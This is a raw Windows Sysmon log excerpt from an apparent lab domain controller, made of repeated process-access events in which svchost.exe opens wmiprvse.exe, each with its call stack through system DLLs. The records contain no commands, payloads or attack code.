13:30:32.248{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.217{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 